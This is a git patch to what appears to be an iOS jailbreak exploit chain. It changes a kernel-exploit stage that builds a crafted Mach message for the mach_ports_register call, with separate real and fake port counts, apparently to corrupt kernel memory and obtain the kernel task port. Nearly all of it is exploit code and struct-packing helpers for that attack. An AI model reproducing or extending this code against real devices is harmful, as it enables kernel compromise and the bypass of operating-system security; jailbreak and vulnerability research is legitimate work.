From 7a206940e14b0d269744bd598be075e33ef19aea Mon Sep 17 00:00:00 2001 From: spv420 Date: Mon, 1 Aug 2022 13:45:45 -0400 Subject: fuck --- src/stage4/kexp/exploit.js | 43 ++++++++++++++++++++++++------------------- src/stage4/lib/native_ptr.js | 31 +++++++++++++++++++++++++------ src/stage4/main.js | 4 +++- 3 files changed, 52 insertions(+), 26 deletions(-) diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js index 8103639..327c813 100755 --- a/src/stage4/kexp/exploit.js +++ b/src/stage4/kexp/exploit.js @@ -277,28 +277,33 @@ function release_port_ptrs(port) { function r3gister(task, init_port_set, real_count, fake_count) { var mess = shit_heap(0x1000); -// var InP = mess; -// var OutP = mess; - - var InP = new Request(1, mess); - var OutP = new Reply(1, mess); - - write_u32(InP + 0x18, 1); - write_u32(InP + 0x1c, init_port_set); - write_u32(InP + 0x20, real_count); - write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24))); - write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0)); - write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4)); - write_u32(InP + 0x30, fake_count); - write_u32(InP + 0x0, 0x80001513); - write_u32(InP + 0x8, task); - write_u32(InP + 0xc, mig_get_reply_port()); - write_u32(InP + 0x14, 3403); - - var ret = mach_msg(InP, 0x3, 0x34, 0x2c, read_u32(InP + 0xc), MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); + var InP_ptr = mess; + var OutP = mess; + + var InP = new Request_r3(1, mess); + var InP_obj = InP.deref(); + + InP_obj.msgh_body.msgh_descriptor_count = 1; + InP_obj.init_port_set.address = init_port_set; + InP_obj.init_port_set.count = real_count; + InP_obj.init_port_set.disposition = 19; + InP_obj.init_port_set.deallocate = false; + InP_obj.init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; + InP_obj.NDR = read_buf(NDR_record + get_dyld_shc_slide(), 8); + InP_obj.init_port_setCnt = fake_count; + InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE); + InP_obj.Head.msgh_remote_port = task; + InP_obj.Head.msgh_local_port = mig_get_reply_port(); + InP_obj.Head.msgh_id = 3403; + + InP.write(InP_obj); + + var ret = mach_msg(InP.addy, 0x3, 0x34, 0x2c, InP_obj.Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); if (ret == KERN_SUCCESS) { + // i'm not making a fucking class for this shit ret = read_u32(OutP + 0x24); } + return ret; } diff --git a/src/stage4/lib/native_ptr.js b/src/stage4/lib/native_ptr.js index 81ac562..1ae5456 100644 --- a/src/stage4/lib/native_ptr.js +++ b/src/stage4/lib/native_ptr.js @@ -271,8 +271,7 @@ function Request_r3_buf_to_obj(buf) { return ret; } -/* -function Request_r3_buf_to_obj(buf) { +function Request_r3_obj_to_buf(obj) { var ret = new Uint8Array(this.size); var tmp = mach_msg_header_t_obj_to_buf(obj.Head); var begin = 0; @@ -292,16 +291,32 @@ function Request_r3_buf_to_obj(buf) { ret[i] = tmp[i - begin]; } - var tmp = mach_msg_ool_ports_descriptor_t_obj_to_buf(obj.init_port_set[i]); + var tmp = mach_msg_ool_ports_descriptor_t_obj_to_buf(obj.init_port_set); + + begin = i; + + for (; i < 40; i++) { + ret[i] = tmp[i - begin]; + } + + var tmp = buf_ret(obj.NDR); begin = i; - for (; i < 36; i++) { + for (; i < 48; i++) { ret[i] = tmp[i - begin]; } + var tmp = u32_to_u8x4(obj.init_port_setCnt); -}*/ + begin = i; + + for (; i < 52; i++) { + ret[i] = tmp[i - begin]; + } + + return ret; +} function buf_ret(buf) { return buf; @@ -333,7 +348,11 @@ var mach_msg_type_number_t = uint32_t; var Request_r3 = native_ptr_type(24 + 4 + 12 + 8 + 4, Request_r3_buf_to_obj, - buf_ret); + Request_r3_obj_to_buf); + +/*var Reply_r3 = native_ptr_type(24 + 4 + 12 + 8 + 4, + Reply_r3_buf_to_obj, + Reply_r3_obj_to_buf);*/ var mach_msg_trailer_type_t = uint32_t; var mach_msg_trailer_size_t = uint32_t; \ No newline at end of file diff --git a/src/stage4/main.js b/src/stage4/main.js index 7baffe2..ec29972 100644 --- a/src/stage4/main.js +++ b/src/stage4/main.js @@ -154,7 +154,9 @@ function main() { // return; - var tfp0 = get_kernel_task(); + r3gister(0x41, 0x42, 0x43, 0x44); + +// var tfp0 = get_kernel_task(); syslog(LOG_SYSLOG, "__p0laris_LOG_END__"); return 0; -- cgit v1.2.3